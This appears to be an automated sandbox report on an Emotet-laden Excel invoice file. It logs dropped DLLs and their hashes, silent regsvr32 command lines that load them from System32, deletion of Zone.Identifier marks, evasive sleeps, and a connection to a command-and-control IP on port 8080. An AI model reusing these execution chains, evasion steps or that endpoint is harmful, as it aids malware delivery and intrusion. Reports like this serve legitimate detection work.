                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020AA06_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800078A46_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F0A86_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180022AAC6_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E4AC6_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800048B06_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ACB46_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007EB46_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800090B46_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800162BC6_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800270C06_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800280C86_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001AEC86_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800050D46_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800234D86_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F6DC6_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800026DC6_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002ADC6_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002ACE86_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800150F06_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E2F46_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016AF46_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000DEF46_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DEFC6_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800125006_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800241046_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800063086_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001370C6_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A10C6_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180028D106_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74DBD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF753BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74D7FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF7537FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D27FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74DB3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF753B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2BD70 appears 113 times
                      Source: Rechnung.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: Rechnung.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll 278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll 90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                      Source: Rechnung.xlsVirustotal: Detection: 42%
                      Source: Rechnung.xlsReversingLabs: Detection: 34%
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocxJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6C68.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@15/16@5/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: Rechnung.xlsOLE indicator, Workbook stream: true
                      Source: Rechnung.xls.0.drOLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C CloseHandle,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,4_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Rechnung.xlsInitial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C892 push ebp; retf 3_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D095 push B3B8007Eh; iretd 3_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D0F3 push ebp; iretd 3_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013551 push ebx; retf 3_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D15D push ebx; retn 0068h3_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CDA8 push ebp; iretd 3_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CE36 push 458B0086h; iretd 3_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013551 push ebx; retf 4_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C892 push ebp; retf 5_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D095 push B3B8007Eh; iretd 5_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D0F3 push ebp; iretd 5_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013551 push ebx; retf 5_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D15D push ebx; retn 0068h5_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000CDA8 push ebp; iretd 5_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000CE36 push 458B0086h; iretd 5_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013551 push ebx; retf 6_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C892 push ebp; retf 7_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D095 push B3B8007Eh; iretd 7_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D0F3 push ebp; iretd 7_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180013551 push ebx; retf 7_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D15D push ebx; retn 0068h7_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000CDA8 push ebp; iretd 7_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000CE36 push 458B0086h; iretd 7_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180013551 push ebx; retf 8_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: uxevr1.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5bd5c
                      Source: uxevr3.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5c302
                      Source: uxevr2.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x66558
                      Source: me435CErJsFGw1q[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x66558
                      Source: klJrMZJhgldiJr6j0XWPeZOiGs[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5c302
                      Source: RD05UTHGkitvIJt[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5bd5c
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\GistaKepWrpVA\oAaDhgd.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\ITAzDMJQNXvQb\pSYwk.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\GistaKepWrpVA\oAaDhgd.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\ITAzDMJQNXvQb\pSYwk.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 672Thread sleep time: -360000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2576Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 280Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2020Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2628Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2648Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-16375
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.3 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,6_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,8_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16377
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16481
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_5-16481
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_5-16668
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000007.00000002.953259566.00000000000FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_000007FEF9D30215
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000007FEF9D2BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7533280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000007FEF7533280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF753BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000007FEF753BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000007FEF74D3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_000007FEF74D3280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000007FEF74DBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000007FEF74DBE50

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_000007FEF9D28900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation,3_2_000007FEF9D28860

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.1240649290.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.943959485.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.953530856.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1240847022.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.935688692.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1241152796.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
